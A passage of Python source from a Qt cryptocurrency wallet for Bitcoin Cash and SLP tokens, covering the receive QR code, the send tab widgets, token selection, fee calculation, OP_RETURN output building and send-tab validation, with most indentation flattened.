# otherwise give up and just re-use one.
addr = self.wallet.get_receiving_address()
self.receive_address = addr
self.update_receive_address_widget()
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None)
self.set_receive_address(self.wallet.get_receiving_address(frozen_ok=False))
def show_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window()
self.qr_window.setAttribute(Qt.WA_DeleteOnClose, True)
weakSelf = Weak.ref(self)
def destroyed_clean(x):
if weakSelf():
weakSelf().qr_window = None
weakSelf().print_error("QR Window destroyed.")
self.qr_window.destroyed.connect(destroyed_clean)
self.update_receive_qr()
if self.qr_window.isMinimized():
self.qr_window.showNormal()
else:
self.qr_window.show()
self.qr_window.raise_()
self.qr_window.activateWindow()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.update_receive_address_widget()
def update_receive_qr(self):
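        '''Rebuild the receive-request URI and QR code from the current amount
        (BCH or token), message and OP_RETURN settings, and mirror the result to
        the detached QR window if it is open.'''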
        if self.receive_token_type_combo.currentData() is not None and self.receive_slp_amount_e.text() != '':
amount = self.receive_slp_amount_e.text() # if self.receive_slp_amount_e.text() is not '' else None
token_id = self.receive_token_type_combo.currentData()
else:
amount = self.receive_amount_e.get_amount()
token_id = None
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
kwargs = {}
if self.receive_opreturn_e.isVisible():
# set op_return if enabled
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
opret = self.receive_opreturn_e.text()
if opret:
kwargs[arg] = opret
# Special case hack -- see #1473. Omit bitcoincash: prefix from
# legacy address if no other params present in receive request.
if Address.FMT_UI == Address.FMT_LEGACY and not kwargs and not amount and not message:
uri = self.receive_address.to_ui_string()
elif not token_id:
# Otherwise proceed as normal, prepending bitcoincash: to URI
uri = web.create_URI(self.receive_address, amount, message, **kwargs)
else:
uri = web.create_URI(self.receive_address, amount, message, **kwargs, token_id=token_id)
self.receive_qr.setData(uri)
if self.qr_window:
self.qr_window.set_content(self, self.receive_address_e.text(), amount,
message, uri, **kwargs)
if self.is_slp_wallet:
if Address.FMT_UI == Address.FMT_SLPADDR:
self.show_slp_addr_btn.setText("Show BCH Address")
else:
self.show_slp_addr_btn.setText("Show Token Address")
def on_slptok(self):
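        '''Called when the Send tab token selector changes: selecting a token
        enables the token amount widgets and disables the BCH amount and
        OP_RETURN widgets (and vice versa), then refreshes status and fee.'''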
self.slp_token_id = self.token_type_combo.currentData()
self.payto_e.check_text()
self.slp_amount_e.setText("")
if self.slp_token_id is None:
self.amount_e.setDisabled(False)
self.amount_label.setDisabled(False)
self.max_button.setDisabled(False)
self.fiat_send_e.setDisabled(False)
self.slp_extra_bch_cb.setHidden(True)
self.slp_amount_e.setDisabled(True)
self.slp_max_button.setDisabled(True)
self.slp_amount_label.setDisabled(True)
self.message_opreturn_e.setEnabled(True)
self.opreturn_rawhex_cb.setEnabled(True)
self.opreturn_label.setEnabled(True)
else:
self.slp_extra_bch_cb.setHidden(False)
self.slp_extra_bch_cb.setChecked(False)
self.slp_extra_bch_cb.clicked.emit()
self.slp_amount_e.setDisabled(False)
self.slp_max_button.setDisabled(False)
self.slp_amount_label.setDisabled(False)
tok = self.wallet.token_types[self.slp_token_id]
self.slp_amount_e.set_token(tok['name'][:6],tok['decimals'])
self.message_opreturn_e.setEnabled(False)
self.message_opreturn_e.setText('')
self.opreturn_rawhex_cb.setEnabled(False)
self.opreturn_label.setEnabled(False)
self.update_status()
self.do_update_fee()
def on_slptok_receive(self):
self.receive_slp_amount_e.setText("")
self.receive_amount_e.setText("")
slp_token_id = self.receive_token_type_combo.currentData()
self.update_receive_qr()
if slp_token_id is None:
self.receive_slp_amount_e.setDisabled(True)
self.receive_slp_amount_label.setDisabled(True)
self.receive_amount_e.setDisabled(False)
self.receive_amount_label.setDisabled(False)
self.fiat_receive_e.setDisabled(False)
else:
self.addr_toggle_slp(True)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
self.receive_amount_e.setDisabled(True)
self.receive_amount_label.setDisabled(True)
self.fiat_receive_e.setDisabled(True)
tok = self.wallet.token_types[slp_token_id]
self.receive_slp_amount_e.set_token(tok['name'][:6],tok['decimals'])
def on_slp_extra_bch(self):
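        '''Enable the BCH amount widgets when the extra-BCH checkbox is ticked
        while sending a token; otherwise clear and disable them.'''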
if self.slp_extra_bch_cb.isChecked():
self.amount_e.setDisabled(False)
self.amount_label.setDisabled(False)
self.max_button.setDisabled(False)
self.fiat_send_e.setDisabled(False)
else:
self.amount_e.setText('')
self.max_button.setChecked(False)
self.amount_e.setDisabled(True)
self.amount_label.setDisabled(True)
self.max_button.setDisabled(True)
self.fiat_send_e.setDisabled(True)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.parent = self
self.slp_send_tab_widgets = []
if self.is_slp_wallet:
self.slp_amount_e = SLPAmountEdit('tokens', 0)
self.token_type_combo = QComboBox()
if ColorScheme.dark_scheme and sys.platform == 'darwin':
# Hack/Workaround to QDarkStyle bugs; see https://github.com/ColinDuquesnoy/QDarkStyleSheet/issues/169#issuecomment-494647801
self.token_type_combo.setItemDelegate(QStyledItemDelegate(self.token_type_combo))
self.token_type_combo.setFixedWidth(200)
self.token_type_combo.currentIndexChanged.connect(self.on_slptok)
self.token_type_combo.currentIndexChanged.connect(self.update_buttons_on_seed) # update 'CoinText' button, etc
self.slp_send_tab_widgets += [
self.slp_amount_e, self.token_type_combo
]
# NB: the translators hopefully will not have too tough a time with this
# *fingers crossed* :)
msg = "<span style=\"font-weight:400;\">" + _('Recipient of the funds.') + " " + \
_("You may enter:"
"<ul>"
"<li> Bitcoin Cash <b>Address</b> <b>★</b>"
"<li> Bitcoin Legacy <b>Address</b> <b>★</b>"
"<li> Simple Ledger <b>Address</b>"
"<li> <b>Contact name</b> <b>★</b> from the Contacts tab"
#"<li> <b>CoinText</b> e.g. <i>cointext:+1234567</i>"
"<li> <b>OpenAlias</b> e.g. <i>satoshi@domain.com</i>"
"</ul><br>"
" <b>★</b> = Supports <b>pay-to-many</b>, where"
" you may optionally enter multiple lines of the form:"
"</span><br><pre>"
" recipient1, amount1 \n"
" recipient2, amount2 \n"
" etc..."
"</pre>")
self.payto_label = payto_label = HelpLabel(_('Pay &to'), msg)
payto_label.setBuddy(self.payto_e)
qmark = ":icons/question-mark-dark.svg" if ColorScheme.dark_scheme else ":icons/question-mark-light.svg"
qmark_help_but = HelpButton(msg, button_text='', fixed_size=False, icon=QIcon(qmark), custom_parent=self)
self.payto_e.addWidget(qmark_help_but, index=0)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter(self.payto_e)
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('&Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
description_label.setBuddy(self.message_e)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('&OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
self.opreturn_label.setBuddy(self.message_opreturn_e)
hbox = QHBoxLayout()
hbox.addWidget(self.message_opreturn_e)
self.opreturn_rawhex_cb = QCheckBox(_('&Raw hex script'))
self.opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
hbox.addWidget(self.opreturn_rawhex_cb)
grid.addLayout(hbox, 3, 1, 1, -1)
self.send_tab_opreturn_widgets = [
self.message_opreturn_e,
self.opreturn_rawhex_cb,
self.opreturn_label,
]
self.from_label = QLabel(_('&From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_label.setBuddy(self.from_list)
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
if self.is_slp_wallet:
msg = _('Token Amount to be sent.') + '\n\n' \
+ _("To enable make sure 'Address Mode' is set to SLP.") + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
self.slp_amount_label = HelpLabel(_('Token Amount'), msg)
msg = _('Select the SLP token to send.')
self.slp_token_type_label = HelpLabel(_('Token Type'), msg)
grid.addWidget(self.slp_token_type_label, 5, 0)
grid.addWidget(self.token_type_combo, 5, 1)
grid.addWidget(self.slp_amount_label, 6, 0)
hbox = QHBoxLayout()
self.amount_e.setMinimumWidth(195)
self.slp_amount_e.setMinimumWidth(195)
self.slp_amount_e.textEdited.connect(self.update_fee)
hbox.addWidget(self.slp_amount_e)
self.slp_max_button = EnterButton(_("Max"), self.slp_spend_max)
hbox.addWidget(self.slp_max_button)
grid.addLayout(hbox, 6, 1)
self.slp_extra_bch_cb = QCheckBox(_('Also send BCH?'))
self.slp_extra_bch_cb.clicked.connect(self.on_slp_extra_bch)
self.slp_extra_bch_cb.setHidden(True)
grid.addWidget(self.slp_extra_bch_cb, 6, 2)
self.slp_send_tab_widgets += [
self.slp_max_button, self.slp_extra_bch_cb
]
msg = _('BCH amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
self.amount_label = HelpLabel(_('BCH &Amount'), msg)
self.amount_label.setBuddy(self.amount_e)
grid.addWidget(self.amount_label, 7, 0)
hbox = QHBoxLayout()
hbox.addWidget(self.amount_e)
self.max_button = EnterButton(_("&Max"), self.spend_max)
self.max_button.setCheckable(True)
hbox.addWidget(self.max_button)
grid.addLayout(hbox, 7, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 7, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('F&ee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_e_label.setBuddy(self.fee_slider)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 9, 0)
hbox = QHBoxLayout()
hbox.addWidget(self.fee_slider)
hbox.addWidget(self.fee_custom_lbl)
hbox.addWidget(self.fee_e)
hbox.addStretch(1)
grid.addLayout(hbox, 9, 1)
self.preview_button = EnterButton(_("&Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("&Send"), self.do_send)
self.cointext_button = EnterButton(_("Coin&Text"), self.do_cointext)
self.cointext_button.setToolTip(_('Process CoinText, transforming it into a BIP70 payment request.'))
self.clear_button = EnterButton(_("&Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
buttons.addWidget(self.cointext_button)
buttons.addStretch(1)
grid.addLayout(buttons, 11, 1, 1, 3)
self.payto_e.textChanged.connect(self.update_buttons_on_seed) # hide/unhide cointext button, etc
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
self.opreturn_rawhex_cb.stateChanged.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
if not self.slp_token_id:
enabled = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enabled)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
if self.is_slp_wallet:
hasError = entry_changed_slp()
if hasError == False:
entry_changed_bch()
else:
entry_changed_bch()
def entry_changed_bch():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough BCH" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
slp = self.wallet.get_slp_locked_balance()
if slp > 0:
text += " (" + self.format_amount(slp).strip() + " BCH held in tokens)"
extra = run_hook("not_enough_funds_extra", self)
if isinstance(extra, str) and extra:
text += " ({})".format(extra)
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be no longer than 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.opreturn_rawhex_cb.stateChanged.connect(entry_changed)
if self.is_slp_wallet:
self.slp_amount_e.textChanged.connect(entry_changed)
self.slp_amount_e.editingFinished.connect(entry_changed)
def entry_changed_slp():
if self.token_type_combo.currentData():
text = ""
name = self.wallet.token_types.get(self.slp_token_id)['name']
decimals = self.wallet.token_types.get(self.slp_token_id)['decimals']
if self.not_enough_funds_slp or self.not_enough_unfrozen_funds_slp:
bal_avail, x, x, x, frozen_amt = self.wallet.get_slp_token_balance(self.slp_token_id, { 'user_config': { 'confirmed_only': False }})
del x
if self.not_enough_funds_slp:
amt_color = ColorScheme.RED
text = "Not enough " + \
name + " tokens (" + \
format_satoshis_plain_nofloat(bal_avail, decimals) + " valid"
if self.config.get('confirmed_only', False):
conf_bal_avail = self.wallet.get_slp_token_balance(self.slp_token_id, self.config)[0]
unconf_bal = bal_avail - conf_bal_avail
if unconf_bal > 0:
text += ", " + format_satoshis_plain_nofloat(unconf_bal, decimals) + " unconfirmed)"
else:
text += ")"
else:
text += ")"
elif self.not_enough_unfrozen_funds_slp:
amt_color = ColorScheme.RED
text = "Not enough unfrozen " + name + " tokens (" + \
format_satoshis_plain_nofloat(bal_avail, decimals) + " valid, " + \
format_satoshis_plain_nofloat(frozen_amt, decimals) + " frozen)"
elif self.slp_amount_e.isModified():
amt_color = ColorScheme.DEFAULT
else:
amt_color = ColorScheme.BLUE
try:
if self.slp_amount_e.get_amount() > (2 ** 64) - 1:
amt_color = ColorScheme.RED
maxqty = format_satoshis_plain_nofloat((2 ** 64) - 1, self.wallet.token_types.get(self.slp_token_id)['decimals'])
text = _('Token output quantity is too large. Maximum {maxqty}.').format(maxqty=maxqty)
except TypeError:
pass
self.statusBar().showMessage(text)
self.slp_amount_e.setStyleSheet(amt_color.as_stylesheet())
if text != "":
return True
return False
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
self.invoice_list.chkVisible()
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
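# 'Max' button handlers: spend_max marks the BCH amount as "send everything"
# and recomputes the fee; slp_spend_max fills the token amount field from the
# wallet's reported balance for the selected token.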
def spend_max(self):
self.max_button.setChecked(True)
self.do_update_fee()
def slp_spend_max(self):
self.slp_amount_e.setAmount(self.wallet.get_slp_token_balance(self.slp_token_id, self.config)[3])
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
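# Helpers that turn the OP_RETURN field contents into a transaction output.
# output_for_opreturn_stringdata splits the text on '<push>' markers and builds
# an OP_RETURN script from the pieces (hex for '<hex>' prefixes, UTF-8 otherwise),
# raising OPReturnTooLarge if the script exceeds the allowed size.
# output_for_opreturn_rawhex instead treats the whole text as raw hex appended
# after the OP_RETURN opcode.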
@staticmethod
def output_for_opreturn_stringdata(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
pushes = op_return.split('<push>')
script = "OP_RETURN"
for data in pushes:
if data.startswith("<hex>"):
data = data.replace("<hex>", "")
elif data.startswith("<empty>"):
pass
else:
data = data.encode('utf-8').hex()
script = script + " " + data
scriptBuffer = ScriptOutput.from_string(script)
if len(scriptBuffer.script) > 223:
raise OPReturnTooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
amount = 0
return (TYPE_SCRIPT, scriptBuffer, amount)
@staticmethod
def output_for_opreturn_rawhex(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturnError(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturnTooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput(op_return_script), amount)
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
bch_outputs = []
token_output_amts = []
self.not_enough_funds = False
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
fee_rate = None
if self.is_slp_wallet:
slp_amount = self.slp_amount_e.get_amount()
if amount is None and slp_amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.statusBar().showMessage('')
return
else:
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.statusBar().showMessage('')
return
try:
selected_slp_coins = []
if self.slp_token_id:
amt = slp_amount or 0
selected_slp_coins, slp_op_return_msg = SlpCoinChooser.select_coins(self.wallet, self.slp_token_id, amt, self.config)
if slp_op_return_msg:
bch_outputs = [ slp_op_return_msg ]
token_output_amts = slp.SlpMessage.parseSlpOutputScript(bch_outputs[0][1]).op_return_fields['token_output']
for amt in token_output_amts:
# just grab a dummy address for this fee calculation - safe for imported_privkey wallets
bch_outputs.append((TYPE_ADDRESS, self.wallet.get_addresses()[0], 546))
bch_payto_outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if bch_payto_outputs and bch_payto_outputs[0][2]:
bch_outputs.extend(bch_payto_outputs)
elif self.slp_token_id and amount and not bch_payto_outputs:
_type, addr = self.get_payto_or_dummy()
bch_outputs.append((_type, addr, amount))
if not bch_outputs:
_type, addr = self.get_payto_or_dummy()
bch_outputs.append((_type, addr, amount))
if not self.slp_token_id:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if (opreturn_message != '' and opreturn_message is not None):
if self.opreturn_rawhex_cb.isChecked():
bch_outputs.insert(0, self.output_for_opreturn_rawhex(opreturn_message))
else:
bch_outputs.insert(0, self.output_for_opreturn_stringdata(opreturn_message))
fee = self.fee_e.get_amount() if freeze_fee else None
tx = self.wallet.make_unsigned_transaction(self.get_coins(isInvoice = False), bch_outputs, self.config, fee, mandatory_coins=selected_slp_coins)
if self.slp_token_id:
self.wallet.check_sufficient_slp_balance(slp.SlpMessage.parseSlpOutputScript(slp_op_return_msg[1]), self.config)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except NotEnoughFundsSlp:
self.not_enough_funds_slp = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except NotEnoughUnfrozenFundsSlp:
self.not_enough_unfrozen_funds_slp = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturnTooLarge:
self.op_return_toolong = True
return
except OPReturnError as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
if not self.slp_token_id or len(token_output_amts) > 0:
self.fee_e.setAmount(fee)
if self.max_button.isChecked():
amount = tx.output_value()
if self.is_slp_wallet:
amount = tx.output_value() - len(token_output_amts) * 546
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
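# Show either the fee slider or the static custom-fee label, depending on
# whether a custom fee rate is configured; optionally update the label text.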
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
if not item:
return
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
on_pw_cancel = kwargs.pop('on_pw_cancel', None)
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
if callable(on_pw_cancel):
on_pw_cancel()
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
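# Gather and validate everything entered on the send tab. Returns
# (bch_outputs, fee, label, coins, selected_slp_coins) on success, or None
# after showing an error dialog when validation fails.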
def read_send_tab(self, preview=False):
bch_outputs = []
selected_slp_coins = []
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if self.slp_token_id:
if self.slp_amount_e.get_amount() == 0 or self.slp_amount_e.get_amount() is None:
self.show_message(_("No SLP token amount provided."))
return
try:
""" Guard against multiline 'Pay To' field """
if self.payto_e.is_multiline():
self.show_error(_("Too many receivers listed.\n\nCurrently this wallet only supports a single SLP token receiver."))
return
""" Guard against bad address encoding """
if not self.payto_e.payto_address:
self.show_error(_("Receiver SLP address is missing."))
return
""" Require SLPADDR prefix in 'Pay To' field. """
if networks.net.SLPADDR_PREFIX not in self.payto_e.address_string_for_slp_check:
self.show_error(_("Address provided is not in SLP Address format.\n\nThe address should be encoded using 'simpleledger:' or 'slptest:' URI prefix."))
return
amt = self.slp_amount_e.get_amount()
selected_slp_coins, slp_op_return_msg = SlpCoinChooser.select_coins(self.wallet, self.slp_token_id, amt, self.config)
if slp_op_return_msg:
bch_outputs = [ slp_op_return_msg ]
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
except (NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp) as e:
self.show_error(str(e))
return
isInvoice = False
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
if self.slp_token_id:
self.show_error('BIP-70 Payment requests are not yet working for SLP tokens.')
return
isInvoice = True
bch_outputs.extend(self.payment_request.get_outputs())
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
if self.slp_token_id:
_type, _addr = self.payto_e.payto_address
bch_outputs.append((_type, _addr, 546))
if self.payto_e.is_alias and not self.payto_e.validated:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
coins = self.get_coins(isInvoice=isInvoice)
""" SLP: Add an additional token change output """
if self.slp_token_id:
change_addr = None
token_outputs = slp.SlpMessage.parseSlpOutputScript(bch_outputs[0][1]).op_return_fields['token_output']
if len(token_outputs) > 1 and len(bch_outputs) < len(token_outputs):
""" start of logic copied from wallet.py """
addrs = self.wallet.get_change_addresses()[-self.wallet.gap_limit_for_change:]
if self.wallet.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.wallet.get_num_tx(addr) == 0]
if not change_addrs:
import random
change_addrs = [random.choice(addrs)]
change_addr = change_addrs[0]
elif len(change_addrs) > 1:
change_addr = change_addrs[1]
else:
change_addr = change_addrs[0]
elif coins:
change_addr = coins[0]['address']
else:
change_addr = self.wallet.get_addresses()[0]
bch_outputs.append((TYPE_ADDRESS, change_addr, 546))
# add normal BCH amounts
if not self.payment_request and self.amount_e.get_amount():
bch_outputs.extend(self.payto_e.get_outputs(self.max_button.isChecked()))
""" Only Allow OP_RETURN if SLP is disabled. """
if not self.slp_token_id:
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
bch_outputs.append(self.output_for_opreturn_rawhex(opreturn_message))
else:
bch_outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
if not bch_outputs:
self.show_error(_('Enter receiver address (No BCH outputs).'))
return
for _type, addr, amount in bch_outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
return bch_outputs, fee, label, coins, selected_slp_coins
_cointext_popup_kill_tab_changed_connection = None
def do_cointext(self):
''' This is called by the cointext button 'clicked' signal and it
